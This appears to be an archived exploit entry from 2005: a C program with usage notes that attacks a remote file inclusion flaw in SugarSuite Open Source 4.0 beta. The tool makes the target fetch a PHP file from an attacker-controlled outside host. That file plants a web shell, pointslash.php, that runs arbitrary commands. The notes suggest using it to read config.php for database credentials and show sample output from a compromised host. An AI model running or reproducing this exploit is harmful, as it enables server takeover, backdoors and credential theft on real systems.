SugarSuite Open Source 4.0beta - Remote Code Execution (2)



Platform:

PHP

Published:

2005-12-08

/*

gcc -o sugar sugar.c

Usage ./sugar [host] [/path/] [site] [cmd]

Sugar Suite Open Source <= 4.0 beta remote code execution (c code)
coded by: pointslash v.
credits: rgod, unitedasia

host - hostname (ex: www.sitename.com)
path - path (ex: /sugar/ or just / )
site - remote location ( ex: http://www.somesite.com/file.txt)
cmd  - specify a command ("cat config.php" to see database username & password)

example ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%20-a;

Put this in your file.txt

<?php
$fp=fopen("pointslash.php","w");
fputs($fp,"<? error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>

./sugar  www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2005 12:35:33 GMT
Server: Apache/1.3.27 (Unix)  (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html

Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown


*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define HTTP_PORT 80


#define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n<?php\n$fp=fopen(\"pointslash.php\",\"w\");\nfputs($fp,\"<? error_reporting(0);ini_set('max_execution_time',0); system(\\$HTTP_GET_VARS[cmd]);?>\");\nfclose($fp);\n?>\n\n"


/****************** MAIN *********************/

void sendpacket(char buffer[8192], int p, char host[100]);


int main( int argc, char **argv)
{

    char buffer[8192];
    int count;
    char data[190];
    if(argc<5)
    {
         printf("Usage %s [host] [/path/] [site] [cmd]\n\nSugar Suite Open Source <= 4.0 beta remote code execution (c code)\ncoded by: pointslash \ncredits: rgod, unitedasia\n\n",argv[0]);
         printf("host - hostname (ex:www.sitename.com)\n");
         printf("path - path (ex: /sugar/ or just / )\n");
         printf("site - remote location ( ex: http://www.somesite.com/file.txt)\n");
         printf("cmd  - specify a command (\"cat config.php\" to see database username & password)\n");
         sprintf(data, DATA);
         printf(data);
         exit(1);
    }


    sprintf( buffer, "GET %sacceptDecline.php?beanFiles[1]=%s&beanList[1]=1&module=1 HTTP/1.0\nUser-Agent: MantraAgent\nHost: %s\nConnection: Close\n\n", argv[2], argv[3], argv[1]);

    sendpacket(buffer,0,argv[1]);

    sprintf( buffer, "GET %spointslash.php?cmd=%s HTTP/1.0\nUser-Agent: Vagabondo/2.0 MT\nHost: %s\nConnection: Close\n\n", argv[2], argv[4], argv[1]);

    sendpacket(buffer,1,argv[1]);

    return count;
}

void sendpacket(char buffer[8192], int p, char host[100])
{

    struct sockaddr_in server;
    struct hostent *host_info;
    unsigned long addr;
    int sock;
    char dat[8192];
    int count;

    /* create socket */
    sock = socket( PF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror( "failed to create socket");
        exit(1);
    }

    /* Create socketadress of Server
     * it is type, IP-adress and portnumber */
    memset( &server, 0, sizeof (server));

    /* convert the Servername to a IP-Adress */
    host_info = gethostbyname( host);
    if (NULL == host_info) {
        fprintf( stderr, "unknown server: %s\n", host);
        exit(1);
    }
    memcpy( (char *)&server.sin_addr, host_info->h_addr, host_info->h_length);

    server.sin_family = AF_INET;
    server.sin_port = htons( HTTP_PORT);


    /* connect to the server */
    if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) {
        perror( "can't connect to server");
        exit(1);
    }

    send( sock, buffer, strlen( buffer), 0);

    /* get the answer from server and put it out to stdout */
    if (p==1) {
      do {
          count = recv( sock, buffer, sizeof(buffer), 0);
          write( 1, buffer, count);
      }
      while (count > 0);
    }

    /* close the connection to the server */
    close ( sock);

}

// milw0rm.com [2005-12-08]